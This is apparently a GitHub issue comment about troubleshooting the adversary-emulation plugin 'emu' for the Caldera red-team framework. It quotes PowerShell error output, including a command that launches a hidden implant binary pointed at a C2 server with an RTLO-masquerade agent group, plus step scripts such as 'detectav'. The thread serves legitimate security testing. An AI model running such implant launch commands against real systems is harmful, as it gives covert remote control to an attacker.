Thamane
commented
3 years ago Hello,
Are you sure you are running the latest version for emu ? It used to have a payload issue that got partially solved last month. Moreover the facts that you are using might be wrong. Your payload point to -server "https://vm01-" as a C2 server ( the server running caldera). It usually looks more like -server "192.168.0.4" depending on the ip where your c2 is located
Multiple payloads are not available while execution:
. .\stepTwelve.ps1;detectav . : The term '.\stepTwelve.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:3
. .\stepThirteen.ps1;comp; . : The term '.\stepThirteen.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
Sleep 3;$bin = Get-ChildItem codscr*;$arguments = '-server "https://vm01-" -group "rtlo_group"';start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments;if ($?) { write-host "Successfully completed RTLO execution. A new agent should appear"; exit 0;} else { write-host "Failure of RTLO execution."; exit 1;} You cannot call a method on a null-valued expression. At line:1 char:151